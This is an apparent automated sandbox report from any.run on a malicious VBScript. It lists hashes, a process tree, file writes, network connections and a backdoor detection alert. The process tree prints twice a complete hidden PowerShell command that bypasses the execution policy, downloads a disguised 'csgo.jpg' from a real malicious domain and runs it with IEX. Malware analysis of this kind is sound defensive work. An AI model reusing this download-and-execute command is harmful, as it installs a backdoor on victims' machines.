File name: | System[1].vbs |
Full analysis: | https://app.any.run/tasks/0fdcb242-ccc9-405d-a4af-40c74f2a8eb5 |
Verdict: | Malicious activity |
Analysis date: | November 15, 2018, 21:48:40 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF line terminators |
MD5: | F041A09CACD3499C446638071872D731 |
SHA1: | 7B41FFA6EA5ED2F91899327D56B319884587B79D |
SHA256: | 17368E8DC968F7718848F66324FB3B793D43480483960AF2455D99015CB10F9F |
SSDEEP: | 12:eufxXfERqdHhFSwi980Qpcn96bmH+udAuZB64RDW0Y7xFCJWjBh8WGW7TZ:eu5P4uHHi/6U+uU4q7xmWAWGW71 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3048 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\System[1].vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Version: 5.8.7600.16385 | ||||
1668 | "C:\Windows\System32\cmd.exe" /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('http://ghost246630.worldhosts.ru/csgo.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack | C:\Windows\System32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2596 | powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('http://ghost246630.worldhosts.ru/csgo.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2596 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\83Z0F64BUXDRTLP8ZRBZ.temp | — | |
MD5:— | SHA256:— | |||
2596 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:43B01A05BB940A9D5D0BE924AB203E0A | SHA256:B9E77DF43925FFAABEEDF95F08B40DD80A8E633D77929AB4F6AD45146332304B | |||
2596 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF109230.TMP | binary | |
MD5:43B01A05BB940A9D5D0BE924AB203E0A | SHA256:B9E77DF43925FFAABEEDF95F08B40DD80A8E633D77929AB4F6AD45146332304B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2596 | powershell.exe | GET | 200 | 5.196.149.90:80 | http://ghost246630.worldhosts.ru/csgo.jpg | FR | text | 46.0 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2596 | powershell.exe | 5.196.149.90:80 | ghost246630.worldhosts.ru | OVH SAS | FR | malicious |
2596 | powershell.exe | 185.86.1.223:5551 | — | Everest Broadcasting Company Ltd | UA | malicious |
Domain | IP | Reputation |
---|---|---|
ghost246630.worldhosts.ru |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2596 | powershell.exe | A Network Trojan was detected | SC BACKDOOR backdoor receiving config via image file (02/18) |